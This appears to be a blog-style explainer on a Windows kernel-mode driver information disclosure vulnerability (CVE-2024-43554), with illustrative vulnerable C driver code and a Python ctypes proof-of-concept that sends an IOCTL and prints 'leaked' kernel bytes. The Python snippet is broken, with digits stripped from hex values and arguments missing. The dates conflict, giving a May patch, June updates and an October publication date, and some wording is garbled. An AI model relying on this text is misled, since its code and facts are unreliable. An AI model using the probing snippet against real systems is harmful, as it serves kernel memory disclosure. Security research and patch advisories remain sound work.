CVE-2024-43554 - Unpacking the Windows Kernel-Mode Driver Information Disclosure Vulnerability

On May 2024, Microsoft released its patch Tuesday updates, quietly fixing a vulnerability identified as CVE-2024-43554—a Windows Kernel-Mode Driver Information Disclosure Vulnerability. Even though it didn't make headline news like some critical remote exploits, the risk posed by this bug should not be underestimated.

In this article, we'll explain what this vulnerability is, how it can be exploited, and what kind of danger it poses. For those who want to understand or check if systems are affected, we'll also include code snippets and links to original references.

What is CVE-2024-43554?

The Windows kernel is the very core of the operating system. Kernel-Mode Drivers (KMD) run with full, unrestricted access to system hardware and sensitive OS data. Vulnerabilities at this level can have serious consequences, including privilege escalation or unintended leakage of protected memory.

CVE-2024-43554 is classified as an information disclosure flaw in the Windows Kernel-Mode Driver. This means it doesn't let attackers directly run code as admin, but can leak sensitive kernel pointers, memory layouts, or other secrets. Such info is often used as a stepping stone in more severe exploits, like bypassing security features (e.g., KASLR).

Affected Component: Windows Kernel-Mode Driver (typically ntoskrnl.exe or a related driver)

- Affected OS: Various versions of Windows 10 and 11 (consult Microsoft's advisory)

How It Works

An attacker with normal user privileges can craft special requests to a vulnerable kernel driver. The driver, due to improper handling of user input, either:

Leaks kernel addresses or contents to user-mode processes.

Imagine a scenario where a system call returns structure data from the kernel to an unprivileged process. If some of the fields in this structure are not set and not zeroed before returning, portions of sensitive memory will leak.

Let's look at a simplified code snippet (for illustration only, not actual source)

NTSTATUS VulnerableIoctlHandler(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    PIO_STACK_LOCATION  irpSp = IoGetCurrentIrpStackLocation(Irp);
    ULONG inputLength = irpSp->Parameters.DeviceIoControl.InputBufferLength;
    ULONG outputLength = irpSp->Parameters.DeviceIoControl.OutputBufferLength;
    PVOID outBuffer = Irp->AssociatedIrp.SystemBuffer;
    KERNEL_STRUCT data;

    // Vulnerable: Only partial initialization
    data.Field1 = GetSomeValue();
    // data.Field2 and others remain uninitialized

    // Copy full structure to user-mode buffer
    RtlCopyMemory(outBuffer, &data, sizeof(KERNEL_STRUCT));

    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = sizeof(KERNEL_STRUCT);
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

In this vnode, data may contain kernel stack contents from previous operations.

Links & References

- Microsoft Security Update Guide - CVE-2024-43554
- Kernel Information Disclosure (Trend Micro)
- "What are Kernel-Mode Drivers?" (Microsoft Docs)
- Speak Security – Windows Information Disclosure Bugs

Exploit Details

While there’s no widespread public exploit code for this bug, creating a proof-of-concept (PoC) is straightforward for skilled hackers. They simply call the affected IOCTL or API, receive output, and then scan for nonzero/unexpected bytes that reveal kernel memory.

Here's a Python snippet that shows how an attacker might test for the bug using Windows APIs

import ctypes

# Example: Use DeviceIoControl to communicate to the kernel
hDevice = ctypes.windll.kernel32.CreateFileW(
    r'\\.\VulnerableDriver',
    xC000000, # GENERIC_READ|GENERIC_WRITE
    , None, 3, , None
)

if hDevice == -1:
    print("Could not open device.")
    exit()

outputbuf = ctypes.create_string_buffer(x100)
bytesreturned = ctypes.c_ulong()

# Replace IOCTL_CODE with the IOCTL number known to trigger the bug
IOCTL_CODE = x222004

ctypes.windll.kernel32.DeviceIoControl(
    hDevice,
    IOCTL_CODE,
    None,
    ,
    ctypes.byref(outputbuf),
    x100,
    ctypes.byref(bytesreturned),
    None
)

print("Leaked data:")
print([hex(b) for b in outputbuf[:bytesreturned.value]])

Such code, when pointed at the correct device and with a known-vulnerable driver and IOCTL, could output chunks of kernel memory otherwise hidden from normal processes.

Mitigation and Detection

- Install Microsoft’s June 2024 security updates ASAP. (Patch download)

Conclusion

CVE-2024-43554 reminds us that not all critical security bugs are about flashy remote exploits. Simple information leaks at the kernel level can undo years of OS-level hardening, and savvy attackers chain such vulnerabilities for more devastating results. If you haven’t already, make sure your Windows systems are up to date—and never overlook information disclosure bugs.

References

- Microsoft Advisory: CVE-2024-43554
- Information Disclosure in Windows Kernel Explained (Spearsecurity)
- SANS Internet Storm Center Overview

Timeline

Published on: 10/08/2024 18:15:21 UTC
Last modified on: 10/13/2024 01:02:04 UTC